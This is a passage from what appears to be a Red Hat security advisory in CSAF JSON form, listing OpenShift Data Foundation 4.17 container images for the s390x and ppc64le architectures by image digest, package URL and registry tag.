"name": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.17.0-31"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.17.0-66"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"product_id": "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"product_id": "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.17.0-60"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"product_id": "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.17.0-29"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"product": {
"name": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"product_id": "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.17.0-7"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.17.0-17"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"product_id": "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.17.0-14"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"product": {
"name": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"product_id": "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"product_id": "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.17.0-20"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"product_id": "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"product_id": "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.17.0-40"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497?arch=s390x\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7?arch=s390x\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.17.0-51"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"product_id": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.17.0-46"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"product": {
"name": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"product_id": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"product": {
"name": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"product_id": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator\u0026tag=v4.17.0-15"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"product_id": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.17.0-69"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"product_id": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"product_id": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.17.0-23"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"product_id": "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"product_id": "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.17.0-31"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.17.0-66"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"product_id": "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"product_id": "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.17.0-60"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"product_id": "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.17.0-29"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"product": {
"name": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"product_id": "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.17.0-7"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
